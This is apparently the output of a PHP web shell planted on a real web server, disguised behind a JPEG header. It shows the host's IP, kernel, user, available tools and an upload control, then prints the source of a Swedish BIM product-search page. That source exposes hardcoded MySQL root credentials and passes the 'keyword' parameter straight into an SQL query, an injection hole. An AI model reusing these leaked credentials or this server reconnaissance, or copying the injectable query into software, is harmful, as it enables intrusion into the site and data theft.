????JFIF??x?x????'
| Server IP : 79.136.114.73 / Your IP : 216.73.217.114 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/www.biminfo.se/portal/ |
Upload File : |
<?php
$link = mysql_connect ("localhost", "root", "root123");
mysql_select_db ("biminfo");
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>BIM-portal</title>
<style type="text/css">
<!--
.style22 {font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; font-weight: bold; }
.style27 {font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; }
A {text-decoration:none;}
.style28 {
font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 10px;
}
.style31 {font-size: 16px}
.style33 {
font-size: 16px;
font-family: Verdana, Arial, Helvetica, sans-serif;
font-weight: bold;
}
-->
</style>
</head>
<body topmargin="0" marginheight="0" bottommargin="0" link="#000000" alink="#000000" vlink="#000000">
<?php
$word = $_POST['keyword'];
if($word == ""){
$word = $_GET['keyword'];
}
$sql = "SELECT * FROM tblContent, tblType, tblCustomer where tblContent.type = tblType.id and tblContent.customerid = tblCustomer.customerid and
(model like '%$word%' or color like '%$word%' or size like '%$word%' or customer like '%$word%' or tblType.type like '%$word%' or keywords like '%$word%') ";
$result = mysql_query($sql);
while ($row = mysql_fetch_assoc($result)){
$model = $row['model'];
$thumb = $row['thumb'];
$path = $row['path'];
$size = $row['size'];
$color = $row['color'];
$type = $row['type'];
$customer = $row['customer'];
$linkid = $row['linkid'];
?>
<span class="style22"><br>
<br>
</span>
<table width="643" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="148" height="124" valign="top"><img src="<?php echo($thumb);?>" width="100" height="100" border="1"></td>
<td width="452" valign="top"><table width="513" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="367"><table width="366" border="0" cellspacing="0" cellpadding="0">
<tr class="style27">
<td width="95">Namn:</td>
<td width="271" height="20"><?php echo($model);?></td>
</tr>
<tr class="style27">
<td>Produktinfo:</td>
<td height="20"><a href="http://www.biminfo.se/?id=<?php echo($linkid);?>" target="_blank">http://www.biminfo.se/?id=<?php echo($linkid);?></a></td>
</tr>
<tr class="style27">
<td>Storlek:</td>
<td height="20"><?php echo($size);?></td>
</tr>
<tr class="style27">
<td>Färg:</td>
<td height="20"><?php echo($color);?></td>
</tr>
<tr class="style27">
<td>Typ:</td>
<td height="20"><?php echo($type);?></td>
</tr>
</table></td>
<td width="116"><div align="center"><a href="http://www.biminfo.se/portal/<?php echo($path);?>"><img src="images/download_arrow.jpg" width="85" height="84" border="0"><br>
<span class="style28">Ladda ner <?php echo($type);?>-fil. </span></a><span class="style28"> </span></div></td>
</tr>
</table></td>
</tr>
</table>
<?php }?>
</body>
</html>